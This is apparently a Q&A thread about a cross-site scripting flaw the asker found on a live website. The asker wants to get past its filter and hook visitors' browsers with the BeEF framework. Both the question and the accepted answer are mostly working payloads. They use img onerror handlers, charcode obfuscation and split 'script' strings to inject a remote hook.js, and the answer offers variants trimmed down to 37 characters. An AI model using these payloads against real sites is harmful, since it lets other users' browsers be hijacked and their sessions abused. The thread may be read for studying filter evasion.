# XSS filter bypass to hook BeEF

Tags: xss, javascript, beef

I found a vulnerability on a website which allows me to trigger XSS.
It's a very specific vulnerability, which is caused by a design-flaw. I want to write a PoC for them but I'm stuck at this step.

The XSS-payload is not delivered through an URL, and is not stored in a database. So, it's nor persistent-XSS nor reflective-XSS.
The attacker has to enter the payload into a box, and send it to another user of that website by altering a specific ID.

Anyway, my question. They filter XSS but not good enough, because this bypass, can bypass their filter:

```
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
```

The problem is, how do I use this specific filter to hook BeEF on it?
I tried:

```
<IMG SRC=/ onerror="document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 32, 115, 114, 99, 61, 34, 49, 50, 55, 46, 48, 46, 48, 46, 49, 58, 51, 48, 48, 48, 47, 104, 111, 111, 107, 46, 106, 115, 34, 62, 60, 47, 115, 99, 114, 105, 112, 116, 62))"></img>
```

But that payload ain't delivered clean, as result I get a lot of other HTML mixed.
I also searched if there are already articles explaining how to bypass XSS filters to hook BeEF on it, but I found none.

So my question, is there a way to bypass XSS filters, to be able to hook BeEF on it? I'm not asking [how to bypass XSS](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet) in general, I'm asking it in a situation where you want to include the BeEF  hook.js` file.

**Edit 1:** An extra problem, I only have exact 116 characters to enter in the box. I don't think there is a problem to shorten JavaScript that much?
Also, what I meant with "I got a mix with a lot of HTML", was that when I entered that other long string, the box 'absorbed' a piece of HTML code.
What also would satisfy is using the window.open() function, to open a website containing the hook in a new window or tab or whatever.

**Edit 2:** I found a way of opening a new URL in a new tab by using this code: `<img src="/" onerror="window.open('http://127.0.0.1:3000/hook.js', '_blank')">` However, the user gets a warning that a pop-up was blocked, and when he allows it than, he gets focus on that tab immediately. Does this satisfy for a PoC? Or does anyone have better solutions?

Comment: What technology is doing the XSS filtering?
Have you identified what is triggering the filter? What happen if you replace document.write with alert?
Also, check https://html5sec.org/ for ideas of other elements you can work with - perhaps XSS filtering is only for some of the html tags / parameters.

Answer (score 5, accepted):

## Original version

Using `document.write` in an event can cause problems is the event is fired after the page is loaded (i.e. closed), because the browser will then [clear the document](http://javascript.info/tutorial/document-write) and start a new blank one. I am not sure I understand what the "payload ain't delivered clean, as result I get a lot of other HTML mixed" is supposed to mean, but this might be your problem.

If so, try using this (minus the line breaks and comments) as a payload:

```
var x = document.createElement(String.fromCharCode(115, 99, 114, 105, 112, 116)); // "script"
x.src = String.fromCharCode(49, 50, 55, 46, 48, 46, 48, 46, 49, 58, 51, 48, 48, 48, 47, 104, 111, 111, 107, 46, 106, 115); // "127.0.0.1:3000/hook.js" - Might not need to be obfuscated?
document.body.appendChild(x);
```

Based on [this](https://stackoverflow.com/a/950146/2200659) answer.

## Shorter versions

I will write these with white spaces included for readability, but those can off course be removed. I am asuming that only the word `script` is filtered since you used `fromCharCode`. If more is filtered, you might have to change these a little, but there should be wiggle room.

**Alt 1 (94 characters)**

```
y = document;
x = y.createElement("scr" + "ipt");
x.src = "127.0.0.1:3000/hook.js";
y.body.appendChild(x)
```

If `script` without `<` and `>` is OK, you could gain some charactes by removing `"+"`.

**Alt 2 (with jQuery, 43 characters)**

```
$["getScr"+"ipt"]("127.0.0.1:3000/hook.js")
```

Again, if `script` is OK you can get down to 37 characters:

```
$.getScript("127.0.0.1:3000/hook.js")
```